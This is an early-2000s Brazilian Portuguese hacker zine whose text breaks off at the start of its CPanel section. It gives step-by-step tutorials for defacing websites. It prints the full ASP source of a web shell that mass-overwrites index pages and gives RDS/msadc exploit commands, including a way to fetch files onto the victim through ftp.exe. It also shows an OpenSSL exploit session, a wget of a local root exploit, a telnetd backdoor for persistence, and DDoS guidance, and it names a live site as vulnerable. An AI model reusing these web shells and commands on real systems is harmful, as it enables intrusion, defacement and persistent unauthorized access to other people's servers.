Acid Zine n°1 - Para melhor visuallização mantenha maximizado - Salvar em seu PC - No bloco de notas ativar quebra de linha automatica(Editar) - Sou bonito fala ae!! - - - - - - - - - - - - _ ____ __ _____ ____ ___ ____ ______ / \ / __| | | | _ \ / __| / _ \ | _ \ | ____\ | O | | / | | | | \ | | / | / \ | | | \ | | |_ | | | | | | | | | | | | | \_/ | | | || | _| | | | | \___ | | | |_/ | ________ | \__ | | | |_/ | | |___ /__|__\ \_____| |__| |_____/ |________| \____| \___/ |____/ |_____/ ------------------------------------------------------------------------- Site::----------------WWW.KPcrime.org Canal::---------------#kpcrime in brasMERDA eMail::---------------Kernel_panic@hacker.am Kernel_panic he are : Acid_c0de - Paiste - __k__ - Sc0n - Gary_sagara "Mouse não encontrado. Bater no gato (S/N)?" | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ INtroDução - (hhmmm....) ]=- -=[ Eu ]=- Acho q ninguem sabe quem sou sou, intao vamos falar. Sou um menino de XX anos que frequenta o irc a 3 meses, sou o fonder do grupo Kernel_panic( #kpcrime,eu jah escrevi lah em cima mais como tem pessoas que nao leeem o titulo coloco aqui novamente). tenho amizades e inimizades, mais eu acho q se vc nao gosta de mim deve vir falar em meu pvt, mais isso nao vem ao caso agora. decidi fazer esta zine por que nao tinha nada para fazer numa sexta a tarde, intaum reuni algumas coisas q sei e decidi publicar aqui. Se você tem alguma coisa que queira publicar na proxima zine entre em contato comigo. PAra enche linguiça vou colocar minha historia Em meados de 2002 ( junho ou por ai ) começei a fazer meu curso tao desejado de informatica, o basico!!!Nossa.!!!!!!Era um prazewr nao faltava nenhum dia sequer, mais ainda nao ti8nha pc em casa.Chegava no curso mais ou menos uma hora antes para ficar nos bate papos.... afffff.... Em um belo dia um cara me falo que havia um belo site que falava sobre hacking, e me deu o endereço o www.6666.cjb.net. PAssei algum tempo navegando nele e lendo algumas coisas que eu nem entendia o q era, foi um erro, entrei na sessão LAmmer e reparei que os links estavam meios diferentes mais mesmo assim decidi continuar, no primeiro click em "como se tornar um hacker" foi que tudo começou......... Mais de um milhao de janelas se abriram na minha frente.....putz..minhas pernas adormeceram na hora....me olhos brilharam....porra como ele fez isso????meu prof° faltou ver cristo, ficou loko da vida e me retirou da sala. Com o passar do tempo começei a frequentar mais sites hackers como o Cemiterio hacker, central do hacker, atividade hacker e talz( esses sites tem todo conteudo puxados do mesmo lugar). Começei a me enteresar em HTml, fiz a minha primeira page no tripod, mais ainda com o assistente e sem net em ksa, apenas poucos minutos em meu curso.Mais ou menos em setembro ganhei meu PC. Nossa foi o melhor dia da minha vida um dia que ninca vou esquecer, foi um Athlon 1.6, 40GB, 128mb com o windows ME, mais ainda nao tinha telefone e nao acessava a net de casa, fazia tudo emmeu curso.LOgo nos primeiros dias jah domava o HTml e fiz uma pagina com o nome de www.lobopage.cjb.net( elevando que meu apelido é Lobinho....nao vao me caçoar no irc seus merdas!!!!!)Essa foi a minha segunda pagian e primeira em html. Como o tempo começei a me enteresar em java, pois foi isso que me colocou nesse mundo, fiz entao o www.arp666.cjb.net( pagina que ainda esta no ar)coloquei uns efeitos em java html e talz. Foi em pessquisas que conheci o IRC, logo depois fiz o www.h4k3.kit.net, foi a page mais loka do memento, jah me sentia o super hacker.Quando minha casa foi abençoada com a oitava maravilha do mundo, o telefone tudo se abriu.LOgo no primeiro dia entrei no irc, no #hacker, e conheci o THB_MAtrix, e entrei no clan #THB_Clan, era tudo 7 maravilhas, começei a me enteresar em defaced quando comprei a revista H4CK3R e vi defaceds do grupo Red_eye, hax0rs Lab.Começei a frequentar mais o knal red_eye mais nao aprendia nada, fazia pergutas toscas e sem sentido. Em um belo dia conheci o Evolui...(beijo morzin...lembrei do c :D ) Um kra que wonava sites e registrava no zone-h( nao era tao burro, jah sabia o que era sites bons de segurança) o kra mne ensinou RDS, , vamos admtir que esse ataque é meio falho, pois nao existem mais sites vullneraveis. Começei a usar o nick _H4K3_(devido ao site que eu tinha)com o tempo o Evolui me ensinou PDw, nossa ai eu jah me senti o super hacker, wonanva pages( bem soh redeface, mais era soh o começo) montei o 0P3N, atuamos um dia, dai fui instalar o LInux em minha casa, o Mandrake, que soh dava uma unica mensagen de erro "kernel_panic", fiquei loko,tanta raiva que montei o grupo. :D Com algum tempo o Faisca_Sk8 (dawe cowboy :) ) me aprensentou o Ry3.Asp codado pelo Sujos e me deu uma força pois estava em breve a desistir, foi ai que em um belo dia achei o scan do arplhmd, estava completo agora, fiz muitos mass, conheci muitas pessoas, muitos canais. Dai decidi mudar de nick depois que wonaram meu site, fiquei brabo mais é a vida, agora sou o Acid_c0de - o gostoso do IRC. No ultimo dia de meu curso foi publicado um deface meu na H4CK3R, metade de meu sinho jah esta realizado, meu prof° ficou orgulhoso, bem feito hahahahaha Agora com um pouco mais de 2 meses mexendo com deface, estou aqui sentado em minha cadeira branca escrevendo essa merda que ninguem vai ler e ensinado um pouco d que sei e algumas coisas que achei por ai... Então vamos ao q interresa. -=[ Agora sim a introdução ]=- /////// // X X // > / \__~/ || ///// (\ \) (~) // o ( \ \ / / // > ( \ \/ /____________/ \__O ( \__/ _____\// / | /( / / ______)/ ( | // \ \ / / ( ) \ () \ \O/ ` \ | ) ) ) ) / / ( |_ / /_ (____> (____> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ Indice ]=- -=[id 1( Usando o PDW )------------------------------------Acid_c0de]=- -=[id 2( Usando o ry3.asp )--------------------------------Acid_c0de]=- -=[id 3( ArpLhmd )-----------------------------------------Acid_c0de]=- -=[id 4( DDos )--------------------------------------------Acid_c0de]=- -=[id 5( Rds )--------------------------------nem sei quem escreveu]=- -=[id 5( SSl )-----------------------------------------------ViperX]=- -=[id 6( CPanel )-----------------------------------------Acid_c0de]=- -=[id 7( PHPbb 2.0 )--------------------------------------Acid_c0de]=- | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ Pdw = Pasta da Web ]=- Tpw = Vulnerabilidade para explorar e desconfigurar paginas Sistemas falhos = Ruindow$ 2000, nt ,e asim $u$$e$ivamente Nota = SUX Bem esta talvez seja umas das tecnicas mais tsc's de invadir um sistema, so de pensar que ainda existe admin que deixa esta falha assim me da enjoos :(~ Esta é uma falha resultante na mal configuração do servidor, assim deixando vulneravel a qualquer individuo entrar e vasculhar todo o servidor. Primeiro vamos encontar um site vulneravel. Vou lah com o meu scaner codado pelo arplhmd( www.arplhmd.cjb.net ) e coloco em scan a minha lista feita por outro programa codado pelo arplhmd. Blz!!!!!!Achei um site!!!!!R0x Garanto q vc vai dizer isso........... aqui vai um exemplo q nem sei se quando vc pegar esta zine este site vai estar vull ainda http://hacker.webhostme.com Vc vai pensar: Blz achei um site agora vou wonar, mais como????? :/ Assim é facil: Você vai ate meus locais de rede ( lugar que eu acho que voce nunca abriu neh? Sabia :/ ), clica em adicionar novo local de rede e coloca o endereço la http://hacker.webhostme.com e de OK Vai demorar um pouco e se der certo vai aparecer uma caixinha pedindo para confirmar ai vc confirma e espera abrir a janela com todo o conteudo do site. R0x neh? Nao!!!! Eu acho essa vull vergonhosa, nao q eu nao goste de quem usa ela, se mesmo pq eu usei muito ela, mais com o tempo enjooa sabe. Depois dela aberta vc podera modificar o q quiser inclusive as index, mais tem muitos sites que vc abre a pasta e nao consegue grava nada nele. POr isso fike esperto. | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ Ry3.asp ]=- Tpw = Exploit para total acesso a maquinas servidoras Sistemas falhos = Ruindow$ 2000, nt ,e asim $u$$e$ivamente Nota = R0x ( para o xpt por que a vull é tosca) Aqui veremos o uso do famoso Ry3 codado pelo Sujos do Red Eye. Ele se trata de um exploit que te da total controle do servidor vullnervel a pdw. Mais vc deve estar pensando: POxa! deve ser um xpt para rodar no dos e todos aqueles codigos me deixam com dor de cabeça!!!! Nao!! POde esfriar a cuca pq nao se trata de nada disso. Vamos ao Uso: Quando voce descobre um site vullnervel a pdw voce abre a pasta e cola o xpt lah. Ai você vai em seu navegador preferido, que garanto q é o Internet Explorer, e digita: www.servidorvullneravel.com/ry3.asp Pronto a magica esta feita!!!! :D Agora é so vc fazer o sseguinte, aqui vamos ultilizar um exemplo simples: Todo servidor IIS ou na maioria das vezes hospeda os sites na pasta c:\wwroot\ ou c:\inetpub , mais isso aparece no xpt em "vc esta em: " Vamos supor que vc esteja em c:\wwroot. Bem o site que vc colocou o xpt ficara assim c:\wwroot\servidorvulneravel\ry3.asp. O q isso quer dizer?hun.....?nao escutei....? Dexa pra lah eu falo................ Quer dizer que so sites estao na pasta c:\wwroot. ò q legal Mais para que serve isso tudo? Simples, com isso você podera wonar ( para os mais desinformados wonar significa desconfigurar uma pagina ) mais sites no servidor. Mais como vou saber a url do site? Quando vc achar os diretorios vc vai colocar em "caminho" no ry3 assim: c:\wwroot ( supondo o servidor acima ) Ai vai aparecer os sites que deram OK assim OK em site 1 OK em site 2 OK em site 3 OK em site 4 OK em site 5 OK em site 6 OK em site 7 OK em site 8 Dai você pega a url do primeiro site e completa com o nome das pastas EX:www.site1.com, www.site2.com ( suppondo q o server seja www.servidorvullneravel.com ) Você podera pegar o que eu melhorei em http://www.kpcrime.kit.net/ry3.zip Ai vai o codigo fonte do 1° ry3, mais nao esqueça que ele tem que ser em uma pagina asp hein o burro!!! :/ <% On Error Resume Next Set Objeto=Server.CreateObject("Scripting.FileSystemObject") if request("t5") <> "" then Set ObjPasta = Objeto.GetFolder(request("t5")) end if %> <%On Error Resume Next if request("t3") <> "" then Set ObjPasta2 = Objeto.GetFolder(request("t3")) set ObjFso=server.CreateObject("Scripting.FileSystemObject") var_caminho=request("t3") For Each Pasta in ObjPasta2.Subfolders Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False) ObjAbreArq.writeline request("t4") if err then response.write "
Erro em: " & pasta.name err=0 else response.write "
OK em " & pasta.name end if set ObjAbreArq = nothing next set ObjFso=nothing Set ObjPasta2 = nothing set ObjFso = nothing end if %> .
Você está em: <%=server.mappath("ry3.asp")%>
Caminho:
Texto:

Prompt: >

Diretórios Numerados

Arquivos
<% On Error Resume Next dim contador contador=1 For Each Pasta in ObjPasta.Subfolders Response.Write Contador & "-) "& Pasta.Name & "
" contador=contador+1 next%> 		 <%On Error Resume Next For Each Arquivo in ObjPasta.Files Response.Write Arquivo.Name & "
" Next%>  

Caminho:

<%On Error Resume Next if request("tt") <> "" then var_caminho=request("tt") set ObjFso2=server.CreateObject("Scripting.FileSystemObject") Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False) Do While Not ObjAbreArq2.AtEndOfStream Linha = Linha & ObjAbreArq2.Readline & chr(13) Loop response.write "" ObjAbreArq2.Close Set ObjAbreArq2 = Nothing ObjFso2.close set ObjFso2 = Nothig end if%> <%set ObjPasta = nothing set Objeto = nothing%> Intaum é isso qualquer duvida me encontre no knal #kpcrime falow!!! | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ ARPLHMD ]=- Bem esta talvez seja o cara que vai marcar o deface, ele é autor dos mais ultilizados scaners da net, aqui no caso nao vou citar todos, pois sao todos e eu teria que falar muito, e nao estou afim de escrever. Vou falar do arplhmd netcraft search, que é o programa para fazer lista dos sites a partir do www.netcraft.com, que tem cadastrado mais de 7 milhoes de sites do mundo inteiro. Voce podera baixar a partir do endereço http://www.arplhmd.cjb.net ( você nao quer que eu dou o endereço certinho neh???) Aqui vai os mais importantes( ou mais usados) arplhmd_netcraft_search Serve para fazer as lista do site, vc coloca uma palavra chave e aparece sites relacionados a ela group xploit pdw o scaner, é soh importar a lista q ele acha sites vull è muito raro achar site vull, mais por isso nao deista facil La você podera encontrar ainda varios scaners como o de Pdw, php-nuke entre outras vullnerabilidades. Vale a pena conferir. | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ DDos ]=- Bom.. vou falar sobre DDoS (Distributed Denial of Service). Traduzindo ficaria Negação de Serviço Distribuída. Pela tradução você já tem uma idéia do que significa. Mas, mesmo se assim você não entendeu, significa fazer com que uma determinada máquina na rede pare de responder à requisições, ou seja, os usuários legítimos dela não irão utilizar seus serviços, enquanto o ataque DDoS se suceder. Esse foi um ataque bastante utilizado nos meses fevereiro/março nos sites mais visitados do mundo, como Yahoo, Altavista, Amazon.com, etc. Note que esses sites ficaram indisponíveis durante horas e horas. Aqui no Brasil também houveram e ainda há ataques DDoS. Sites como Cade?, Zipmail, UOL, entre outros foramatacados. Por exemplo, na madrugada de 19/04 para 20/04 os serviços doUOL, provedor de acesso e notícias on line, ficaram indisponíveis aos seus usuários durante cerca de 6 horas. Adivinhem quem estava por trásdo ataque DDoS... opa! Vamos ao que interessa... O ataque DDoS consiste em enviar um grande número de requisições à umadeterminada máquina. Esta vai tentar responder. Até que no começo ela provavelmente irá conseguir responder às requisições. Mas se as requisições forem contínuas, vai ter um momento em que a máquina não terá capacidade para respondê-las e assim vai deixar de responder a qualquer outra máquina que a requisite. O objetivo foi realizado! Ninguém agora consegue visualizar sequer uma html do seu site... nada! É como se a máquina estivesse desligada. Vou mostrar graficamente mais ou menos como funciona um ataque: ____________ _____ | Largura | | | | de | | _ | |banda alta| | |----| /|__________| | | | / | | |___| | ALVO / | | ________ / | | | | / ____________ _____ | ____________ _____ | | <-- / | Largura | | | | | | | | |Server| ___ /____________| de | | _ | | <-- | VOCÊ | | _ | | | \ |banda alta| | | --------- | | | | | | \ |__________| | | | |__________| | | | | \ | | |___| | | | |___| |______| \ | | \ | | \ ____________ _____ | \| Largura | | | | | de | | _ | | |banda alta| | |----| |__________| | | | | |___| Nota: As máquinas de largura de banda alta são mais eficientes, mas computadores pessoais podem ser usados também. Você deve ter perguntando antes: mas como fazer grandes números de requisições?? Simples... para isso usamos outros computadores (o que deuma certa forma nos protege, se atacássemos diretamente dos nossos seríamos descobertos rapidamente). Em um ataque DDoS usamos muitos computadores. Sevocê não quiser usar tantos computadores assim, podepraticar o ataque usando computadores de largura de banda alta, geralmente encontrados nas Universidades americanas. Desse modo será preciso poucos computadores, já que eles têm enorme poder de ataque. Nos ataques que pratiquei usei máquinas de Universidades americanas. Algumas chegavam a ter uma largura de banda de 200 MB... você tem idéiado que significa isso? Bom.. vamos ao que interessa... O ataque funcionadessa forma: você envia um pacote à essas máquinas, elas "entendem" quedevem requisitar intermitentemente o servidor, que será o alvo. Assim,o alvo não suportará as requisições e ficará indisponibilizado. Está louco para fechar esse arquivo e ir logo praticar um ataque, hein?Mas não é tão simples assim (imaginem se fosse!). As máquinas que você deve usar para suceder o ataque devem estar infectadas com um servidor de serviço. Ou seja, você eve infectá-las, ou conseguir ips de algumas com algum amigo. Eu não estou colocando ips à disposição, pois acho "anti-ético". Os programas mais usados para ataques são: TFN (Tribe Flood Network), TFN2k, trin00, e agora um mais poderoso, que age em conjunto com esses: o mstream. Você pode encontrar ferramentas para praticar um ataque em: http://www.ussrback.com/distributed.htm | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ Rds ]=- // Antes de qualquer coisa, vale lembrar que esse texto eh apenas para fins // educacionais, ou seja, tudo que voce fizer sera responsabilidade sua. // NAO ESTOU INCENTIVANDO NINGUEM A COMETER CRIMES DIGITAIS. // Essas falhas e tecnicas ja estao mundialmente conhecidas, mas mesmo assim // muitos servidores (principalmente do governo brasileiro) ainda estao // vulneraveis. Espero que apos esse texto os admins REALMENTE percebam os // enormes riscos deste problema e o elimine. // Estou levando em conta que voce ira utilizar essas tecnicas apenas // em suas proprias maquinas ou em maquinas que voce tenha devida autorizacao // para isso. Sem apresentacoes, vamos direto ao texto: Atualmente, podemos perceber uma grande demanda de "raquers" invadindo paginas do governo e por esse motivo se auto-intitulando "elite". Entao, mesmo eu nao fazendo parte deste seleto grupo, resolvi mostrar os grandes segredos de invasao usados por essa "superhypermega elite". Ate mesmo na pagina do RFP (o que codou o exploit) voce pode ver o texto: Lammers wanted e um simbolo: RDS. O porque disso tudo? Voce vai entender ja. Como identificar uma pagina "raqueada" com MSADC: 99% das vezes essas paginas estao com fundo branco, apenas com um texto e nenhuma imagem, link, etc O motivo disso voce ira entender mais abaixo. MAS ATENCAO! preste muita, mais muita atencao mesmo, porque essa tecnica e' dificilima, e requer um alto conhecimento tecnico em computacao! Antes de utiliza-la, recomendo que voce faca como a "elite raquer" e leia antes os livros: Manual Completo do Raquer (versao 2000!) Panico na Internerd (1, 2 e 3), e outros textos extremamente tecnicos (huahahahaha) Obs: Vale lembrar que eu nao estou menosprezando quem usa a tecnica do RDS (qualquer tecnica que te de acesso a maquina eh valida) e sim esses grupos que se acham elite por usa-la. Ok, voce ja leu os livros? Entao VAMOS LA, hora de acao! Primeiro, voce vai nos sites abaixo ler um pouquinho, pois nao vou ficar aqui explicando virgula por virgula todos os detalhes do bug. Os textos sao em ingles, mas tem a traducao de um deles por la. A historia em torno desse bug eh muito interessante, involvendo umas "alfinetadas" entre o Russ da NTBugtraq e o RFP. Mas, se voce prefere fazer como a "elite" e ir direto ao assunto ("Nao preciso ler essas porcarias"), ok, vai em frente. http://www.wiretrip.net/rfp/p/doc.asp?id=1 http://www.wiretrip.net/rfp/p/doc.asp?id=3 http://www.wiretrip.net/rfp/p/doc.asp?id=4 http://www.wiretrip.net/rfp/p/doc.asp?id=5 http://www.wiretrip.net/rfp/p/doc.asp?id=29 e dessas hps tem muito mais link p/ vc se virar Voce vai precisar tambem desse script escrito em perl, mas ATENCAO: nao divulgue esse script, ou a "elite" vai puxar seu pe a noite. http://www.wiretrip.net/rfp/bins/scripts/msadc2.pl Depois voce vai precisar do PERL. Se vc nao tem, www.perl.com e pegue a versao do seu SO. Para saber se uma maquina eh vulneravel: vai no browser e digita: http://www.seuservidor.com/msadc/msadcs.dll caso o arquivo for encontrado, provavelmente seu servidor eh vulneravel Encontrou um servudor vulneravel? Ok, entao agora tudo o que voce deve fazer eh o seguinte: (faca um backup do seu index.htm antes p/ nao perde-lo) 1§ - perl msadc.pl -h www.hostvulneravel.com ele vai te pedir para digitar um comando. Voce digita: cmd /c echo Agora tambem sou da elite raquer > caminhoDowwwroot\index.htm pronto. Parabens, 31337! "Po, mas como eu consigo o caminhoDowwwroot?" Vai no seu browser e digita: www.hostvulneravel.com/qualquermerda.idq ou www.hostvulneravel.com/qualquermerda.htx www.hostvulneravel.com/qualquermerda.idc existem outros metodos tb (shtml.exe? hum...), isso fica por sua conta um desses provavelmente ira funcionar, e vc recebera uma pagina com o seguinte erro: "path not found c:\inetpub\wwwroot\qualquermerda.idq" pronto ou seja, fica cmd /c echo Agora tambem sou da elite > c:\inetpub\wwwroot\index.htm Lembrando que outros comandos funcionam perfeitamente. Entao: cmd /c dir c:\ /s > c:\inetpub\wwwroot\dirc.txt vai criar uma listagem dos arquivos na unidade c: em www.hostvulneravel.com/dirc.txt Parabens, agora voce tambem conhece as tecnicas da "elite". --[BONUS!]------------------------------------------------------------------- Como colocar uma html no lugar daquela coisa feia de txt! (ou qualquer outro arquivo) Ok, voce viu que seu servidor esta vulneravel, e resolveu colocar uma html la. Soh que de repente voce percebe que vc nao pode fazer coisas do tipo: cmd /c echo etc,etc,etc > c:\inetpub\wwwroot\test.htm Nao meu amigo, voce tem que usar seu cerebro, e arrumar um outro jeito de colocar o arquivo que voce quer no servidor, neste exemplo, um HTML. (Sim, isso mesmo. Por isso que 99% dos defacements com RDS soh possuem um texto e + nada. Na verdade aquilo nada mais eh que um arquivo texto com extensao htm). Existem diversas tecnicas usadas pra isso, algumas envolvendo compartilhamento de arquivos (usado pelo pessoal do r00tabega em um .pl ai p/ automatizar esse processo), etc. Porem vou descrever aqui uma outra tecnica que funciona perfeitamente. Ela consiste em usar o ftp.exe do servidor para fazer os downloads dos arquivos que nos queremos, e depois usa-los a vontade. (ultimamente andam saindo uns scripts ai que andam usando essa tecnica, mas eu vou explicar como fazer na mao mesmo). Vamos la: Se voce analizar as opcoes do ftp.exe, voce vai ver a seguinte opcao: -s:filename Specifies a text file containing FTP commands; the commands will automatically run after FTP starts. Isso mesmo, se vc usar ftp -s:comandos.txt ele vai rodar os comandos no arquivo comandos.txt. entao, o que vc tem a fazer eh criar um txt no server com os comandos que voce quer. Voce tem que ter um FTP Server onde voce tenha permissao de escrita (sim, pode ser o seu mesmo. Levando em consideracao que voce esta usando isso em maquinas que voce tenha autorizacao, isso nao tem nenhum problema ;) Ok, digamos que nosso ftp Server eh ftp.meuservidor.com no diretorio /incoming do ftp.meuservidor.com nos colocamos nosso arquivo HTML pronto (index.htm) agora, usamos o script (duh!) $ perl msadc.pl -h www.hostvulneravel.com cmd /c echo open > comandos.txt $ perl msadc.pl -h www.hostvulneravel.com cmd /c echo anonymous >> comandos.txt (algumas vezes vc pode ter problemas com os 2 primeiros, por isso os quotes abaixo.) $ perl msadc.pl -h www.hostvulneravel.com cmd /c echo qualquermerda@duh >> comandos.txt $ perl msadc.pl -h www.hostvulneravel.com cmd /c echo quote user anonymous >> comandos.txt $ perl msadc.pl -h www.hostvulneravel.com cmd /c echo quote pass silvio@sol.com.br >> comandos.txt $ perl msadc.pl -h www.hostvulneravel.com cmd /c echo cd /incoming >> comandos.txt (eu gosto de cd antes, e dai? :P) $ perl msadc.pl -h www.hostvulneravel.com cmd /c echo get index.htm >> comandos.txt $ perl msadc.pl -h www.hostvulneravel.com cmd /c echo bye >> comandos.txt e pra finalizar, $ perl msadc.pl -h www.hostvulneravel.com cmd /c ftp -s:comandos.txt seria melhor ver se tudo ocorreu bem, entao seria melhor usar: $ perl msadc.pl -h www.hostvulneravel.com cmd /c ftp -s:comandos.txt > c:\inetpub\wwwroot\ftpresults.txt e ver no ftpresults.txt se tudo rolou como desejado. se tudo ocorreu bem, seu html esta la. pronto amigo, agora coloque ele onde voce quiser :) (se for passar arquivos binarios, nao esqueca do comando bin antes!) E dai em diante, voce pode fazer 1000 coisas. Eh soh ter criatividade. Ok, depois desse texto espero ver algumas htmls legais por ae, e nao aquele monte de texto feio :P :) that's all folks see ya ------------------------------------------------------------------------------ | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ SSl ]=- [*] Ownz Apache SSL server [*] ViperX The King [*] No irc BRASnet #AccessDenied ou #ISOTK [*] ViperX@DaNGeR.OrG [*] 125588534 Uin [Indíce] [1] Introdução [2] Arquivos nescesários [3] Invadindo [4] Adquirindo *root* [5] Alterando [6] Finalizando ----------------------------------- *root* Acesso máximo em um servidor ----------------------------------- [*] Introdução [*] Olá, eu sou o ViperX, frequento a brasnet há quase 2 anos, conheço quase todos os grupos de defacer, carder, sou como todos e estou em busca do mesmo ideal, aprender mais e mais sobre Hacking, que é uma das áreas da informação mais temida e discutida no dia de hoje. Nesse simples texto mostrarei para você como se Invadir um sistema rodando Apache SSL que geralmente é Linux, não é muito complicado, mais toda atenção é poca. Boa leitura. [*] Arquivos nescesários [*] Bom, abaixo irei mostrar alguns arquivos que você irá precisar para ver se o server está ou não com a falha OpenSSL. + Open SSL Scaner + Open SSL Exploit + Exploit Local tudo isso citado acima, e um conhecimentozinho sobre sistemas unix. [*] Invadindo [*] Após você obter seu exploit na sua shell, você irá rodar assim: ./xploit ip -a target se o servidor estiver vulnerável, você irá entrar, : Usando OpenSSL info leak para pegar o endereco ssl0 : 0x8236f08 ssl1 : 0x8236f08 ssl2 : 0x8236f08 : Mandando BRASA (ou seria shellcode) ciphers: 0x8236f08 start_addr: 0x8236e48 SHELLCODE_OFS: 208 bash-2.04$ bash-2.04$ uname -a; id; w; Linux dns.imbp.com.br 2.4.18-2cl #1 Sun Mar 10 23:23:36 BRT 2002 i686 unknown uid=101(www) gid=102(www) groups=102(www) 4:37am up 4 days, 20:51, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - Mon 8am 14:36m 0.08s 0.08s -bash bom, podemos ver, que há 2 usuários na máquina, você e o root :) sim, você deve estar vendo esse uid=101(www) sim, é muito fraco essa identificação, para alterar dados você precisa ter id=0(root) ... você deve estar se perguntando como pegar root sendo que o root está on, bagunçou a cabeça aí ?? relacha... root seria como uma autoridade, em tudo na vida existe mais de uma autoridade certo ? então deu para entender ? ... [*] Adquirindo root [*] Bom, como você tá com uma identificação PODRE, você precisará entrar em uma pasta que você possa executar arquivos, aí que tá .. que pasta hein ? relacha... digite: cd /tmp /tmp é uma pasta que todos os usuário contidos no servidor pode executar qualquer arquivo, bom já deve ter se tocado né ? Veja se sua máquina possue protocolos tcp/ip de transferências. digite: wget (Se aparecer é por que possue) digite: lynx (Se aparecer é por que possue) certo, se um dos dois protocolos tiver você pode baixar um exploit para fuder com essa máquina e adquirir root local. wget http://www.site.com.br/exploitlocal chmod 750 exploitlocal ./local uid=(0)root gid=(0)root [*] Alterando [*] Agora o que todos mais gostam de fazer, ownar, hackear, fuder, tudo isso é sinonimo do que você irá aprender, como você está com root você tem que encontrar o arquivo do Apache que guarda todas as informações do servidor, como se fosse seu dna. digite: find / -name httpd.conf ex: /etc/httpd/conf/httpd.conf cd / cd etc cd httpd cd connf cat httpd.conf pronto, você abriu o arquivo, agora você tem que localizar a seguinte linha: # General setup for the virtual host DocumentRoot /home/httpd/html/ #ServerName new.host.name ServerAdmin root@localhost ErrorLog logs/error_log TransferLog logs/access_log mais o que nos interessa é o "DocumentRoot /home/httpd/html/" pronto, agora você já sabe que as index estão lá... cd / cd home cd httpd cd html ls Dire.mpg english.html index.html index.tmp openwebmail Foto_0213.JPG espanol.html index.html.rpmnew loguin php cdrom.swf hello.php index.html.rpmsave manual wap design imgs index.swf msjavx86.exe webmail a principal no caso é index.html ... agora você diz: Como mudar essa porra ?? .. simples.. calma.. echo hahahah fudi com seu sitee >> index.html wget http://www.meusite.hpg.com.br/minhaindex.html lynx http://www.meusite.hpg.com.br/minhaindex.html ... uma das 3 opções .. [*] Finalizando [*] Bom, você já fez o seu Defacer, agora se você quiser ficar com essa shell root para você entra na pasta /tmp cd /tmp procure na net um backdoor chamado "telnetd" ai coloque ele execute.. ai terá sua shell!! */ ViperX Corporation | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ Cpanel ]=- HEHE olha eu aqui dnovo, vamos cumexa?!?!? Aqui vou lhe aprensentar o 